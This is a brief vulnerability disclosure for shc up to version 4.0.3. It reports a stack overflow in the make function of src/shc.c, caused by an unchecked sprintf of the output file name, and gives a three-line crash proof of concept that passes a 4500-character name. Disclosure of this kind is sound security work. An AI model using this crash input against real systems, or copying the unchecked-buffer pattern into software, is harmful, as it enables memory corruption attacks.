BUG_Author: s0l42

Affected Version: shc ≤ 4.0.3

Vendor: shc GitHub Repository

Software: shc

Vulnerability Files:

• src/shc.c

Description:

Stack Overflow:

• In the file src/shc.c, the function make does not check the file name length, and uses sprintf formats the user input file2 to cmd, whose size is 4096. Thus, a stack overflow happened.

Proof of Concept:

$ touch 1.sh
$ echo '#!/bin/sh\\nls' > 1.sh
$ ./shc -f 1.sh -o `python -c "print('a'*4500)"`

If success, a segment fault happend.

Seeing the stack, full filled with 0x61(’a’)